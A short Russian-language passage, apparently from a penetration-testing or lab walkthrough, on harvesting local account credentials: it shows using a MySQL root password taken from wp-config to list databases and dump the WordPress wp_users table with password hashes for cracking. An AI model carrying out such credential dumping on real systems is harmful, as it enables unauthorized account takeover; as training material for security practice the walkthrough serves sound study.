01 - Локальные аккаунты

В данном случае локальные аккаунты это учетки не только на том же сервере, но и в других программах, например в базе Mysql, gitlab, ansible или любое другое прикладное ПО. Часто они могут храниться в открытом виде или быть в виде хэша.

Так как у нас есть root доступ к БД, мы можем подсмотреть хэш пароля пользователя steven и попытаться его расшифровать.

// Заходим в mysql с паролем который подсмотрели в wp-config
mysql - u root -p
// смотрим список баз
show databases;
//выбираем wordpress
use wordpress;
//смотрим список таблиц
show tables;
//смотрим всех пользователей + хэши паролей
select * from wp_users;

хэш пользователя в mysql

Отлично, осталось крэкнуть хэш.